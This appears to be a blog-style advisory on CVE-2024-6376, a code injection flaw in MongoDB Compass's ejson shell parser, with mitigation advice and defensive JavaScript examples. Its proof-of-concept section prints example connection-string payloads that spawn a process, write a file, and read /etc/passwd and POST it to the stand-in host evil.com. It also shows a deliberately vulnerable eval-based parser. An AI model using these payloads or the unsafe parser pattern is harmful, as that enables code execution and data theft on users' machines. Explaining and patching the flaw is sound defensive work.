CVE-2024-6376 is a code injection vulnerability in MongoDB Compass, the desktop GUI for MongoDB databases. The flaw stems from insufficient sandbox protection around the ejson shell parser that Compass uses in its connection handling. Compass versions before 1.42.2 are affected, so if you run an older build, the machine Compass runs on is at risk.
Let’s break down everything you need to know about this vulnerability, how it works, and what you should do right away to stay safe.
What’s the Issue? (Technical Details Simplified)
MongoDB Compass lets users enter connection strings and related connection settings to reach their databases. Parts of that input are handled by a parser for shell-style Extended JSON ("ejson"), a syntax that is more flexible than plain JSON because it understands helpers such as ObjectId(...). The advisory does not spell out exactly which field feeds the parser; what matters is that in versions before 1.42.2 the parser was embedded without strict sandboxing, so crafted text could escape the intended data-only role of the parser and run code on your computer.
1. A user opens Compass and enters a database connection string.
2. If the string carries a crafted payload, the ejson shell parser evaluates part of it as JavaScript instead of treating it purely as data.
3. Because the sandbox around that parser was insufficient, the JavaScript runs with the privileges of the Compass process and can reach the filesystem, environment variables, and the network.
Imagine an attacker sends you a connection string like this (the shell= option is illustrative, not a documented MongoDB URI option; it stands in for whichever input reaches the parser):
mongodb://localhost:27017/?authSource=admin&readPreference=primary&ssl=false&shell={ "$where": "function() { require('child_process').exec('calc.exe'); return true; }" }
If the parser is not sandboxed, connecting with this string could pop open the Calculator app on Windows, or worse. The $where value is only dangerous because the parser evaluates it; a parser that treats the text as data would store the string and never run it.
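To make that distinction concrete, here is an added example (not Compass or MongoDB code) in JavaScript, the language Compass runs in: a permissive parser that hands shell-style input to the JavaScript engine, beside a strict recursive-descent parser that accepts only literals and a whitelist of helper constructors. The helper names ObjectId, ISODate and NumberLong, the demonstrate() function and the payload are assumptions constructed for this example; the real ejson-shell-parser is more complete and its fix differs in detail. The payload sets a global flag where a real one would spawn a process.

```javascript
// Added example (not MongoDB/Compass code): a permissive "shell syntax" evaluator
// beside a whitelist-only parser for Extended-JSON-style input. Helper names are
// assumptions for the demo; the real ejson-shell-parser is more complete.

const SHELL_HELPERS = {
  ObjectId: (hex) => {
    if (typeof hex !== 'string' || !/^[0-9a-fA-F]{24}$/.test(hex)) throw new SyntaxError('ObjectId expects 24 hex chars');
    return { $oid: hex.toLowerCase() };
  },
  ISODate: (s) => {
    const t = typeof s === 'string' ? Date.parse(s) : NaN;
    if (Number.isNaN(t)) throw new SyntaxError('ISODate expects a date string');
    return { $date: new Date(t).toISOString() };
  },
  NumberLong: (n) => {
    if (!/^-?\d+$/.test(String(n))) throw new SyntaxError('NumberLong expects an integer');
    return { $numberLong: String(n) };
  },
};

// VULNERABLE: hands the text to the JavaScript engine. The helpers are passed in
// as parameters, but the text may contain any expression at all, so a crafted
// value runs with the full privileges of the process that called parseLoose().
function parseLoose(text) {
  const names = Object.keys(SHELL_HELPERS);
  // eslint-disable-next-line no-new-func
  const fn = new Function(...names, `"use strict"; return (${text});`);
  return fn(...names.map((n) => SHELL_HELPERS[n]));
}

// HARDENED: a recursive-descent parser. Nothing is ever evaluated; the only
// "calls" accepted are the whitelisted helpers, each validating its own argument.
function parseStrict(text) {
  let i = 0;
  const fail = (msg) => { throw new SyntaxError(`${msg} at offset ${i}`); };
  const ws = () => { while (i < text.length && /\s/.test(text[i])) i += 1; };
  const peek = () => { ws(); return text[i]; };
  const eat = (ch) => { if (peek() !== ch) fail(`expected '${ch}'`); i += 1; };
  const ident = () => {
    const m = /^[A-Za-z_$][\w$]*/.exec(text.slice(i));
    if (!m) fail('expected identifier');
    i += m[0].length;
    return m[0];
  };
  const string = () => {                       // single- or double-quoted, simple escapes
    const quote = text[i]; i += 1;
    let out = '';
    while (i < text.length && text[i] !== quote) {
      if (text[i] === '\\') { i += 1; out += { n: '\n', t: '\t', r: '\r' }[text[i]] ?? text[i]; }
      else out += text[i];
      i += 1;
    }
    if (text[i] !== quote) fail('unterminated string');
    i += 1;
    return out;
  };
  const number = () => {
    const m = /^-?\d+(\.\d+)?([eE][+-]?\d+)?/.exec(text.slice(i));
    if (!m) fail('malformed number');
    i += m[0].length;
    return Number(m[0]);
  };
  const list = (close, item) => {              // "item, item, ... close"
    const out = [];
    if (peek() === close) { i += 1; return out; }
    for (;;) {
      out.push(item());
      if (peek() === ',') { i += 1; continue; }
      eat(close);
      return out;
    }
  };
  const value = () => {
    const ch = peek();
    if (ch === '{') {
      i += 1;
      const obj = {};
      list('}', () => {
        const key = (peek() === '"' || peek() === "'") ? string() : ident();
        if (key === '__proto__') fail('forbidden key');   // no prototype pollution via keys
        eat(':');
        obj[key] = value();
      });
      return obj;
    }
    if (ch === '[') { i += 1; return list(']', value); }
    if (ch === '"' || ch === "'") return string();
    if (ch === '-' || /\d/.test(ch)) return number();
    const name = ident();
    if (name === 'true') return true;
    if (name === 'false') return false;
    if (name === 'null') return null;
    if (!Object.prototype.hasOwnProperty.call(SHELL_HELPERS, name)) fail(`disallowed identifier '${name}'`);
    eat('(');
    const args = list(')', value);
    if (args.length !== 1) fail(`${name} takes exactly one argument`);
    return SHELL_HELPERS[name](args[0]);
  };
  const result = value();
  if (peek() !== undefined) fail('trailing input');
  return result;
}

// Constructed payload: looks like a filter, but the $where value is an expression
// with a side effect (standing in for require('child_process').exec(...)).
const PAYLOAD = '{ _id: ObjectId("507f1f77bcf86cd799439011"), $where: (globalThis.__pwned = "executed", "x") }';

function demonstrate() {
  delete globalThis.__pwned;
  const loose = parseLoose(PAYLOAD);            // evaluates the payload: flag gets set
  const looseSideEffect = globalThis.__pwned;
  let strictError = null;
  try { parseStrict(PAYLOAD); } catch (e) { strictError = e.message; }   // rejected as syntax
  return { loose, looseSideEffect, strictError };
}
```

Run demonstrate(): the loose parser returns a normal-looking document and, as a side effect, has executed attacker-controlled code; the strict parser throws at the first character that is not a literal or whitelisted helper. Note that parseStrict('{ $where: "function(){ ... }" }') succeeds and returns the function text as an inert string, which is the correct outcome for a parser: whether the $where operator is then allowed at all is a separate policy decision made before the query is sent.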
Proof-of-Concept (PoC) Code Example
The following illustrates the kind of payload such a parser would execute. It is a simplified sketch, not a public exploit: the exact injection point in Compass is not spelled out in the advisory, and the shell= option is a stand-in for it.
Malicious Connection String Example
mongodb://localhost:27017/?shell={
"$where": "function() { require('fs').writeFileSync('hacked.txt', 'You have been hacked!'); return true; }"
}
If this string is parsed unsafely, it writes a file named hacked.txt in the Compass working directory.
JavaScript Payload in ejson
Extended JSON itself has no function type; it is the shell-syntax evaluator that runs function bodies when it is not sandboxed. Here is how an attacker could leak a sensitive file:
mongodb://localhost:27017/?shell={
"$where": "function() {
const fs = require('fs');
const contents = fs.readFileSync('/etc/passwd').toString();
// Send the file contents to a remote server
require('https').request({hostname:'evil.com',method:'POST',path:'/leak'}, r=>{}).end(contents);
return true;
}"
}
Exploitation Scenario
1. Phishing: An attacker convinces a user to paste a malicious connection string into Compass, for example by sharing it as a "ready-made" connection for a test database.
2. Remote Code Execution: The ejson parser runs the payload as raw JavaScript, accessing the system.
3. Data Exfiltration or Tampering: Files are written, read, or sent externally—all without the victim’s knowledge.
Original References and Patches
- MongoDB Compass Release Notes (1.42.2)
- Official CVE database entry for CVE-2024-6376
- MongoDB Security Advisories
Mitigation and Fixes
Users should immediately upgrade to Compass 1.42.2 or later. The vulnerable parser has been properly sandboxed in this version.
- Update Download: MongoDB Compass Download Page
Until you are fully updated, avoid pasting connection strings sent by others, and treat any connection string that contains JavaScript-looking text (function bodies, require(...), $where) as hostile.
Admins: if you believe users opened suspicious strings, look for unexpected files written by Compass (like hacked.txt), unexpected child processes spawned by the Compass process, and outbound connections from Compass to hosts that are not your database servers.
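Finding the installs that still need the update is mostly a version comparison, and naive string comparison gets it wrong (1.42.10 sorts before 1.42.2 as text). Here is an added example, not MongoDB's tooling, that flags Compass versions older than 1.42.2 from an inventory export; the inventory lines and the tab-separated "hostname, product, version" layout are constructed assumptions, and how you collect the versions from endpoints is up to your inventory system.

```javascript
// Added example (not MongoDB tooling): flag Compass installs older than the
// fixed release 1.42.2. The inventory below is constructed; the column layout
// "hostname<TAB>product<TAB>version" is an assumption for this demo.

const FIXED_VERSION = '1.42.2';

// Parse "MAJOR.MINOR.PATCH[-prerelease]" (optional leading "v") into comparable parts.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(v.trim());
  if (!m) throw new Error(`unrecognised version string: ${v}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: m[4] || null };
}

// Component-wise numeric comparison. A pre-release sorts below its release, so
// "1.42.2-beta.0" is still treated as vulnerable. Returns <0, 0 or >0.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let k = 0; k < 3; k += 1) {
    if (pa.nums[k] !== pb.nums[k]) return pa.nums[k] - pb.nums[k];
  }
  if (pa.pre === pb.pre) return 0;
  if (pa.pre === null) return 1;
  if (pb.pre === null) return -1;
  return pa.pre < pb.pre ? -1 : 1;
}

function isVulnerable(version) {
  return compareVersions(version, FIXED_VERSION) < 0;
}

// Constructed inventory export: one install per line.
const INVENTORY = `
ws-alice\tMongoDB Compass\t1.41.0
ws-bob\tMongoDB Compass\t1.42.10
ws-carol\tMongoDB Compass\t1.42.2-beta.0
ws-dave\tMongoDB Compass\t1.42.2
ws-erin\tmongosh\t2.2.6
`;

// Returns "host (version)" for every Compass install that still needs the update.
function findVulnerableHosts(inventory) {
  return inventory
    .split('\n')
    .filter((line) => line.trim().length > 0)
    .map((line) => line.split('\t'))
    .filter(([, product]) => product === 'MongoDB Compass')   // other products are out of scope
    .filter(([, , version]) => isVulnerable(version))
    .map(([host, , version]) => `${host} (${version})`);
}

console.log(findVulnerableHosts(INVENTORY).join('\n'));
```

On the constructed inventory this reports ws-alice and ws-carol only: ws-bob's 1.42.10 is newer than the fix despite sorting first as a string, and mongosh is a different product and is ignored.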
Conclusion
CVE-2024-6376 is a serious code injection flaw affecting MongoDB Compass before 1.42.2. A single pasted connection string could let an attacker run arbitrary code on the user's workstation. Patch now and spread the word among your database teams.
Stay safe, and only use software from trusted sources—updated to the latest version.
Timeline
Published on: 07/01/2024 15:15:17 UTC
Last modified on: 07/03/2024 15:04:52 UTC